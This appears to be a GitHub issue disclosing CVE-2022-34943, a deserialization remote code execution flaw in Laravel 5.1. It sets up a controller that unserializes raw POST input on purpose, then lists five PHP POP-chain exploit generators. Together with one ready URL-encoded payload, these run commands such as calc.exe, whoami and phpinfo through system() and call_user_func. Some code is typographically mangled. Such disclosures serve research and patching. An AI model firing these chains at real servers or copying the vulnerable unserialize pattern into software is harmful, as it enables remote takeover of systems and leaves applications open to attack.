Headline
CVE-2022-34943: Laravel5.1 Unserialize RCE · Issue #1 · beicheng-maker/vulns
Laravel v5.1 was discovered to contain a remote code execution (RCE) vulnerability via the component ChanceGenerator in __call.
Laravel 5.1 POP Chain 1-5
composer create-project --prefer-dist laravel/laravel laravel5.1 “5.1.*”
app/Http/Controllers/UsersController.php adding a controller UsersController
<?php namespace App\Http\Controllers; use Illuminate\Http\Request; class UsersController extends Controller {
/\*\*
\* 创建一个新用户。
\*
\* @param Request $request
\* @return Response
\*/
public function store(Request $request)
{
echo "Please post cmd to unserialize";
$payload\=$request\->input("cmd");
unserialize($payload);
//
}
} ?>
routes/web.php
Route==post(‘/test’,[\App\Http\Controllers\UsersController==class,’store’]);
<?php use Illuminate\Support\Facades\Route; /* |--------------------------------------------------------------------------
| Web Routes |
|---|
| Here is where you can register web routes for your application. These |
| routes are loaded by the RouteServiceProvider within a group which |
| contains the “web” middleware group. Now create something great! |
*/
Route==post(‘/test’,[\App\Http\Controllers\UsersController==class,’store’]);
0x01 RCE 1
<?php namespace Faker; class ChanceGenerator{ private $weight; protected $default; public function __construct(){ $this->weight=0; $this->default=’calc.exe’; } } namespace Faker; class ValidGenerator{ protected $generator; protected $validator; protected $maxRetries; public function __construct(){ $this->generator=new ChanceGenerator(); $this->validator=’system’; $this->maxRetries=1; } }
namespace Illuminate\Broadcasting; use Faker\ValidGenerator; class PendingBroadcast{ protected $events; public function __construct(){ $this->events=new ValidGenerator(); } } echo urlencode(serialize(new PendingBroadcast)); ?>
cmd=O%3A40%3A%22Illuminate%5CBroadcasting%5CPendingBroadcast%22%3A1%3A%7Bs%3A9%3A%22%00%2A%00events%22%3BO%3A20%3A%22Faker%5CValidGenerator%22%3A3%3A%7Bs%3A12%3A%22%00%2A%00generator%22%3BO%3A21%3A%22Faker%5CChanceGenerator%22%3A2%3A%7Bs%3A29%3A%22%00Faker%5CChanceGenerator%00weight%22%3Bi%3A0%3Bs%3A10%3A%22%00%2A%00default%22%3Bs%3A8%3A%22calc.exe%22%3B%7Ds%3A12%3A%22%00%2A%00validator%22%3Bs%3A6%3A%22system%22%3Bs%3A13%3A%22%00%2A%00maxRetries%22%3Bi%3A1%3B%7D%7D
0x02 RCE2
<?php namespace Illuminate\Validation; class Validator{ public $extensions = []; public function __construct(){ $this->extensions[‘’]=’call_user_func’; } }
namespace Illuminate\Routing; use Illuminate\Validation\Validator; class PendingResourceRegistration{ protected $registrar; protected $name; protected $controller; protected $options; public function __construct(){ $this->name=’call_user_func’; $this->controller=’system’; $this->options=’whoami’; $this->registrar=new Validator; } }
RCE 3
<?php
namespace Illuminate\Auth; class RequestGuard{ protected $provider; protected $callback; protected $request; public function __construct(){ $this->callback = 'call_user_func’; $this->request = 'system’; $this->provider = 'calc.exe’; } }
namespace Illuminate\View; use Illuminate\Auth\RequestGuard; class InvokableComponentVariable{ protected $callable=[]; public function __construct(){ $this->callable=[new RequestGuard,’user’]; } } namespace SebastianBergmann\RecursionContext; use Illuminate\View\InvokableComponentVariable; final class Context{ private $arrays = []; public function __construct(){ $this->arrays=new InvokableComponentVariable; } } echo urlencode(serialize(new Context)); ?>
RCE 4
<?php namespace Faker; class DefaultGenerator{ public $default;
} namespace Carbon; class Carbon{}
namespace Faker; class Generator{ protected $formatters = []; public function __construct(){ $this->formatters[‘huahua’]=’system’; } }
namespace Carbon; use Carbon\Carbon; use Faker\DefaultGenerator; use Faker\Generator; class CarbonPeriod{ protected $current; protected $dateClass; protected $filters = []; protected $key; public function __construct(){ $this->dateClass=new DefaultGenerator; $this->dateClass->default=new DefaultGenerator; $this->dateClass->default->default=’huahua’; $this->current=new Carbon; $this->filters[][]=[new Generator,’format’]; $this->key=array(“calc.exe”); } }
namespace Illuminate\View; use Carbon\CarbonPeriod; class InvokableComponentVariable{ protected $callable=[]; public function __construct(){ $this->callable=[new CarbonPeriod,’valid’]; } } namespace SebastianBergmann\RecursionContext; use Illuminate\View\InvokableComponentVariable; final class Context{ private $arrays = []; public function __construct(){ $this->arrays=new InvokableComponentVariable; } } echo urlencode(serialize(new Context)); ?>
RCE 5
<?php namespace Faker; class DefaultGenerator{ public $default;
} namespace Prophecy\Doubler\Generator; use Faker\DefaultGenerator; class ClassCreator{ private $generator; public function __construct(){ $this->generator=new DefaultGenerator; $this->generator->default=’phpinfo();’;
}
}
namespace Carbon; class Carbon{}
namespace Prophecy\Doubler\Generator\Node; class ClassNode{}
namespace Carbon; use Faker\DefaultGenerator; use Prophecy\Doubler\Generator\ClassCreator; use Prophecy\Doubler\Generator\Node\ClassNode; class CarbonPeriod{ protected $current; protected $dateClass; protected $filters = []; protected $key; public function __construct(){ $this->dateClass=new DefaultGenerator; $this->dateClass->default=new DefaultGenerator; $this->dateClass->default->default=’huahua’; $this->current=new Carbon; $this->filters[][]=[new ClassCreator,’create’]; $this->key=new ClassNode; } }
namespace Illuminate\View; use Carbon\CarbonPeriod; class InvokableComponentVariable{ protected $callable=[]; public function __construct(){ $this->callable=[new CarbonPeriod,’valid’]; } } namespace SebastianBergmann\RecursionContext; use Illuminate\View\InvokableComponentVariable; final class Context{ private $arrays = []; public function __construct(){ $this->arrays=new InvokableComponentVariable; } } echo urlencode(serialize(new Context)); ?>